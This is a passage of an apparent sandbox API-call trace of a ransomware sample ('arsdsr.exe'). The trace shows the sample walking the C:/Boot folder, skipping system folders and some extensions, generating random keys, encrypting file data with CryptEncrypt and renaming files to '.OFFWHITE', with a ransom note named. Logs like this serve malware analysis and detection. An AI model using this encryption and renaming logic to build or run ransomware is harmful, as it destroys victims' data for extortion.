(lpString1=".LOG1", lpString2=".dll") returned 1 [0082.185] lstrcmpiW (lpString1=".LOG1", lpString2=".url") returned -1 [0082.185] lstrcmpiW (lpString1=".LOG1", lpString2=".ttf") returned -1 [0082.185] lstrcmpiW (lpString1=".LOG1", lpString2=".mp3") returned -1 [0082.185] lstrcmpiW (lpString1=".LOG1", lpString2=".pif") returned -1 [0082.185] lstrcmpiW (lpString1=".LOG1", lpString2=".mp4") returned -1 [0082.185] lstrcmpiW (lpString1=".LOG1", lpString2=".OFFWHITE") returned -1 [0082.185] lstrcmpiW (lpString1=".LOG1", lpString2=".msi") returned -1 [0082.186] lstrcmpiW (lpString1="BCD.LOG1", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.186] GetProcessHeap () returned 0x500000 [0082.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52be30 [0082.186] CreateFileW (lpFileName="C:/Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0082.186] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x295f260 | out: lpFileSize=0x295f260*=0) returned 1 [0082.186] GetProcessHeap () returned 0x500000 [0082.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a990 [0082.186] GetProcessHeap () returned 0x500000 [0082.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a9a8 [0082.186] GetProcessHeap () returned 0x500000 [0082.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x53b9f8 [0082.186] GetProcessHeap () returned 0x500000 [0082.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x536328 [0082.186] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.186] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.186] SystemFunction036 (in: RandomBuffer=0x52a990, RandomBufferLength=0x10 | out: RandomBuffer=0x52a990) returned 1 [0082.186] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.186] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.187] SystemFunction036 (in: RandomBuffer=0x52a9a8, RandomBufferLength=0x10 | out: RandomBuffer=0x52a9a8) returned 1 [0082.187] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.187] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.187] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x53b9f8*, pdwDataLen=0x295f010*=0x10, dwBufLen=0x100 | out: pbData=0x53b9f8*, pdwDataLen=0x295f010*=0x100) returned 1 [0082.187] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.187] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.187] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x536328*, pdwDataLen=0x295f00c*=0x10, dwBufLen=0x100 | out: pbData=0x536328*, pdwDataLen=0x295f00c*=0x100) returned 1 [0082.187] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.187] SetLastError (dwErrCode=0x0) [0082.187] WriteFile (in: hFile=0x224, lpBuffer=0x53b9f8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295f24c, lpOverlapped=0x0 | out: lpBuffer=0x53b9f8*, lpNumberOfBytesWritten=0x295f24c*=0x100, lpOverlapped=0x0) returned 1 [0082.188] GetLastError () returned 0x0 [0082.188] GetLastError () returned 0x0 [0082.188] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.188] WriteFile (in: hFile=0x224, lpBuffer=0x536328*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295f24c, lpOverlapped=0x0 | out: lpBuffer=0x536328*, lpNumberOfBytesWritten=0x295f24c*=0x100, lpOverlapped=0x0) returned 1 [0082.189] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.189] WriteFile (in: hFile=0x224, lpBuffer=0x52be30*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295f24c, lpOverlapped=0x0 | out: lpBuffer=0x52be30*, lpNumberOfBytesWritten=0x295f24c*=0x8, lpOverlapped=0x0) returned 1 [0082.189] GetProcessHeap () returned 0x500000 [0082.189] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x0) returned 0x52be20 [0082.189] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.189] ReadFile (in: hFile=0x224, lpBuffer=0x52be20, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x295f240, lpOverlapped=0x0 | out: lpBuffer=0x52be20*, lpNumberOfBytesRead=0x295f240*=0x0, lpOverlapped=0x0) returned 1 [0082.189] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.189] WriteFile (in: hFile=0x224, lpBuffer=0x52be20*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295f24c, lpOverlapped=0x0 | out: lpBuffer=0x52be20*, lpNumberOfBytesWritten=0x295f24c*=0x0, lpOverlapped=0x0) returned 1 [0082.189] GetProcessHeap () returned 0x500000 [0082.189] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52be20 | out: hHeap=0x500000) returned 1 [0082.189] CloseHandle (hObject=0x224) returned 1 [0082.190] GetProcessHeap () returned 0x500000 [0082.190] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53b9f8 | out: hHeap=0x500000) returned 1 [0082.190] GetProcessHeap () returned 0x500000 [0082.191] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x536328 | out: hHeap=0x500000) returned 1 [0082.191] GetProcessHeap () returned 0x500000 [0082.191] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52a990 | out: hHeap=0x500000) returned 1 [0082.191] GetProcessHeap () returned 0x500000 [0082.191] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52a9a8 | out: hHeap=0x500000) returned 1 [0082.191] lstrcpyW (in: lpString1=0x295f038, lpString2="C:/Boot\\BCD.LOG1" | out: lpString1="C:/Boot\\BCD.LOG1") returned="C:/Boot\\BCD.LOG1" [0082.191] lstrcatW (in: lpString1="C:/Boot\\BCD.LOG1", lpString2=".OFFWHITE" | out: lpString1="C:/Boot\\BCD.LOG1.OFFWHITE") returned="C:/Boot\\BCD.LOG1.OFFWHITE" [0082.191] MoveFileW (lpExistingFileName="C:/Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="C:/Boot\\BCD.LOG1.OFFWHITE" (normalized: "c:\\boot\\bcd.log1.offwhite")) returned 1 [0082.191] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0082.191] lstrcmpiW (lpString1="BCD.LOG2", lpString2=".") returned 1 [0082.192] lstrcmpiW (lpString1="BCD.LOG2", lpString2="..") returned 1 [0082.192] lstrcmpiW (lpString1="BCD.LOG2", lpString2="...") returned 1 [0082.192] lstrcmpiW (lpString1="BCD.LOG2", lpString2="windows") returned -1 [0082.192] lstrcmpiW (lpString1="BCD.LOG2", lpString2="$recycle.bin") returned 1 [0082.192] lstrcmpiW (lpString1="BCD.LOG2", lpString2="rsa") returned -1 [0082.192] lstrcmpiW (lpString1="BCD.LOG2", lpString2="ntuser.dat") returned -1 [0082.192] lstrcmpiW (lpString1="BCD.LOG2", lpString2="programdata") returned -1 [0082.192] lstrcmpiW (lpString1="BCD.LOG2", lpString2="appdata") returned 1 [0082.192] lstrcmpiW (lpString1="BCD.LOG2", lpString2="program files") returned -1 [0082.192] lstrcmpiW (lpString1="BCD.LOG2", lpString2="program files (x86)") returned -1 [0082.192] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.192] lstrcatW (in: lpString1="C:/Boot\\", lpString2="BCD.LOG2" | out: lpString1="C:/Boot\\BCD.LOG2") returned="C:/Boot\\BCD.LOG2" [0082.192] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.192] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.192] PathFindExtensionW (pszPath="BCD.LOG2") returned=".LOG2" [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".exe") returned 1 [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".log") returned 1 [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".cab") returned 1 [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".cmd") returned 1 [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".com") returned 1 [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".cpl") returned 1 [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".ini") returned 1 [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".dll") returned 1 [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".url") returned -1 [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".ttf") returned -1 [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".mp3") returned -1 [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".pif") returned -1 [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".mp4") returned -1 [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".OFFWHITE") returned -1 [0082.192] lstrcmpiW (lpString1=".LOG2", lpString2=".msi") returned -1 [0082.192] lstrcmpiW (lpString1="BCD.LOG2", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.192] GetProcessHeap () returned 0x500000 [0082.192] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52be20 [0082.193] CreateFileW (lpFileName="C:/Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0082.193] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x295f260 | out: lpFileSize=0x295f260*=0) returned 1 [0082.193] GetProcessHeap () returned 0x500000 [0082.193] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a9a8 [0082.193] GetProcessHeap () returned 0x500000 [0082.193] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a990 [0082.193] GetProcessHeap () returned 0x500000 [0082.193] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x53b9f8 [0082.193] GetProcessHeap () returned 0x500000 [0082.193] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x536328 [0082.193] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.193] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.193] SystemFunction036 (in: RandomBuffer=0x52a9a8, RandomBufferLength=0x10 | out: RandomBuffer=0x52a9a8) returned 1 [0082.193] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.193] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.193] SystemFunction036 (in: RandomBuffer=0x52a990, RandomBufferLength=0x10 | out: RandomBuffer=0x52a990) returned 1 [0082.193] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.193] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.193] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x53b9f8*, pdwDataLen=0x295f010*=0x10, dwBufLen=0x100 | out: pbData=0x53b9f8*, pdwDataLen=0x295f010*=0x100) returned 1 [0082.194] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.194] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.194] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x536328*, pdwDataLen=0x295f00c*=0x10, dwBufLen=0x100 | out: pbData=0x536328*, pdwDataLen=0x295f00c*=0x100) returned 1 [0082.194] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.194] SetLastError (dwErrCode=0x0) [0082.194] WriteFile (in: hFile=0x224, lpBuffer=0x53b9f8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295f24c, lpOverlapped=0x0 | out: lpBuffer=0x53b9f8*, lpNumberOfBytesWritten=0x295f24c*=0x100, lpOverlapped=0x0) returned 1 [0082.195] GetLastError () returned 0x0 [0082.195] GetLastError () returned 0x0 [0082.195] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.195] WriteFile (in: hFile=0x224, lpBuffer=0x536328*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295f24c, lpOverlapped=0x0 | out: lpBuffer=0x536328*, lpNumberOfBytesWritten=0x295f24c*=0x100, lpOverlapped=0x0) returned 1 [0082.195] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.195] WriteFile (in: hFile=0x224, lpBuffer=0x52be20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295f24c, lpOverlapped=0x0 | out: lpBuffer=0x52be20*, lpNumberOfBytesWritten=0x295f24c*=0x8, lpOverlapped=0x0) returned 1 [0082.195] GetProcessHeap () returned 0x500000 [0082.195] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x0) returned 0x52be10 [0082.195] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.195] ReadFile (in: hFile=0x224, lpBuffer=0x52be10, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x295f240, lpOverlapped=0x0 | out: lpBuffer=0x52be10*, lpNumberOfBytesRead=0x295f240*=0x0, lpOverlapped=0x0) returned 1 [0082.195] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.195] WriteFile (in: hFile=0x224, lpBuffer=0x52be10*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295f24c, lpOverlapped=0x0 | out: lpBuffer=0x52be10*, lpNumberOfBytesWritten=0x295f24c*=0x0, lpOverlapped=0x0) returned 1 [0082.195] GetProcessHeap () returned 0x500000 [0082.195] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52be10 | out: hHeap=0x500000) returned 1 [0082.195] CloseHandle (hObject=0x224) returned 1 [0082.196] GetProcessHeap () returned 0x500000 [0082.196] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53b9f8 | out: hHeap=0x500000) returned 1 [0082.196] GetProcessHeap () returned 0x500000 [0082.197] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x536328 | out: hHeap=0x500000) returned 1 [0082.197] GetProcessHeap () returned 0x500000 [0082.197] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52a9a8 | out: hHeap=0x500000) returned 1 [0082.197] GetProcessHeap () returned 0x500000 [0082.197] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52a990 | out: hHeap=0x500000) returned 1 [0082.197] lstrcpyW (in: lpString1=0x295f038, lpString2="C:/Boot\\BCD.LOG2" | out: lpString1="C:/Boot\\BCD.LOG2") returned="C:/Boot\\BCD.LOG2" [0082.197] lstrcatW (in: lpString1="C:/Boot\\BCD.LOG2", lpString2=".OFFWHITE" | out: lpString1="C:/Boot\\BCD.LOG2.OFFWHITE") returned="C:/Boot\\BCD.LOG2.OFFWHITE" [0082.197] MoveFileW (lpExistingFileName="C:/Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="C:/Boot\\BCD.LOG2.OFFWHITE" (normalized: "c:\\boot\\bcd.log2.offwhite")) returned 1 [0082.198] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0082.198] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2=".") returned 1 [0082.198] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="..") returned 1 [0082.198] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="...") returned 1 [0082.198] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="windows") returned -1 [0082.198] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="$recycle.bin") returned 1 [0082.198] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="rsa") returned -1 [0082.198] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="ntuser.dat") returned -1 [0082.198] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="programdata") returned -1 [0082.198] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="appdata") returned 1 [0082.198] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="program files") returned -1 [0082.198] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="program files (x86)") returned -1 [0082.198] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.198] lstrcatW (in: lpString1="C:/Boot\\", lpString2="BOOTSTAT.DAT" | out: lpString1="C:/Boot\\BOOTSTAT.DAT") returned="C:/Boot\\BOOTSTAT.DAT" [0082.198] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.198] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.199] PathFindExtensionW (pszPath="BOOTSTAT.DAT") returned=".DAT" [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".exe") returned -1 [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".log") returned -1 [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".cab") returned 1 [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".cmd") returned 1 [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".com") returned 1 [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".cpl") returned 1 [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".ini") returned -1 [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".dll") returned -1 [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".url") returned -1 [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".ttf") returned -1 [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".mp3") returned -1 [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".pif") returned -1 [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".mp4") returned -1 [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".OFFWHITE") returned -1 [0082.199] lstrcmpiW (lpString1=".DAT", lpString2=".msi") returned -1 [0082.199] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.199] GetProcessHeap () returned 0x500000 [0082.199] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52be10 [0082.199] CreateFileW (lpFileName="C:/Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0082.201] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x295f260 | out: lpFileSize=0x295f260*=65536) returned 1 [0082.202] GetProcessHeap () returned 0x500000 [0082.202] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a990 [0082.202] GetProcessHeap () returned 0x500000 [0082.202] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a9a8 [0082.202] GetProcessHeap () returned 0x500000 [0082.202] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x53b9f8 [0082.202] GetProcessHeap () returned 0x500000 [0082.202] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x536328 [0082.202] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.202] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.202] SystemFunction036 (in: RandomBuffer=0x52a990, RandomBufferLength=0x10 | out: RandomBuffer=0x52a990) returned 1 [0082.202] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.202] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.202] SystemFunction036 (in: RandomBuffer=0x52a9a8, RandomBufferLength=0x10 | out: RandomBuffer=0x52a9a8) returned 1 [0082.202] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.202] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.202] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x53b9f8*, pdwDataLen=0x295f010*=0x10, dwBufLen=0x100 | out: pbData=0x53b9f8*, pdwDataLen=0x295f010*=0x100) returned 1 [0082.203] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.203] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.203] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x536328*, pdwDataLen=0x295f00c*=0x10, dwBufLen=0x100 | out: pbData=0x536328*, pdwDataLen=0x295f00c*=0x100) returned 1 [0082.203] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x10000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.203] SetLastError (dwErrCode=0x0) [0082.203] WriteFile (in: hFile=0x224, lpBuffer=0x53b9f8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295f24c, lpOverlapped=0x0 | out: lpBuffer=0x53b9f8*, lpNumberOfBytesWritten=0x295f24c*=0x100, lpOverlapped=0x0) returned 1 [0082.205] GetLastError () returned 0x0 [0082.205] GetLastError () returned 0x0 [0082.205] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x10100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.205] WriteFile (in: hFile=0x224, lpBuffer=0x536328*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295f24c, lpOverlapped=0x0 | out: lpBuffer=0x536328*, lpNumberOfBytesWritten=0x295f24c*=0x100, lpOverlapped=0x0) returned 1 [0082.205] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x10200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.205] WriteFile (in: hFile=0x224, lpBuffer=0x52be10*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295f24c, lpOverlapped=0x0 | out: lpBuffer=0x52be10*, lpNumberOfBytesWritten=0x295f24c*=0x8, lpOverlapped=0x0) returned 1 [0082.205] GetProcessHeap () returned 0x500000 [0082.205] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10000) returned 0x5517b0 [0082.206] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.206] ReadFile (in: hFile=0x224, lpBuffer=0x5517b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x295f240, lpOverlapped=0x0 | out: lpBuffer=0x5517b0*, lpNumberOfBytesRead=0x295f240*=0x10000, lpOverlapped=0x0) returned 1 [0082.212] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.212] WriteFile (in: hFile=0x224, lpBuffer=0x5517b0*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x295f24c, lpOverlapped=0x0 | out: lpBuffer=0x5517b0*, lpNumberOfBytesWritten=0x295f24c*=0x10000, lpOverlapped=0x0) returned 1 [0082.213] GetProcessHeap () returned 0x500000 [0082.213] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5517b0 | out: hHeap=0x500000) returned 1 [0082.213] CloseHandle (hObject=0x224) returned 1 [0082.215] GetProcessHeap () returned 0x500000 [0082.215] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53b9f8 | out: hHeap=0x500000) returned 1 [0082.215] GetProcessHeap () returned 0x500000 [0082.215] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x536328 | out: hHeap=0x500000) returned 1 [0082.215] GetProcessHeap () returned 0x500000 [0082.215] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52a990 | out: hHeap=0x500000) returned 1 [0082.215] GetProcessHeap () returned 0x500000 [0082.215] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52a9a8 | out: hHeap=0x500000) returned 1 [0082.215] lstrcpyW (in: lpString1=0x295f038, lpString2="C:/Boot\\BOOTSTAT.DAT" | out: lpString1="C:/Boot\\BOOTSTAT.DAT") returned="C:/Boot\\BOOTSTAT.DAT" [0082.215] lstrcatW (in: lpString1="C:/Boot\\BOOTSTAT.DAT", lpString2=".OFFWHITE" | out: lpString1="C:/Boot\\BOOTSTAT.DAT.OFFWHITE") returned="C:/Boot\\BOOTSTAT.DAT.OFFWHITE" [0082.215] MoveFileW (lpExistingFileName="C:/Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="C:/Boot\\BOOTSTAT.DAT.OFFWHITE" (normalized: "c:\\boot\\bootstat.dat.offwhite")) returned 1 [0082.216] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0082.216] lstrcmpiW (lpString1="cs-CZ", lpString2=".") returned 1 [0082.216] lstrcmpiW (lpString1="cs-CZ", lpString2="..") returned 1 [0082.216] lstrcmpiW (lpString1="cs-CZ", lpString2="...") returned 1 [0082.217] lstrcmpiW (lpString1="cs-CZ", lpString2="windows") returned -1 [0082.217] lstrcmpiW (lpString1="cs-CZ", lpString2="$recycle.bin") returned 1 [0082.217] lstrcmpiW 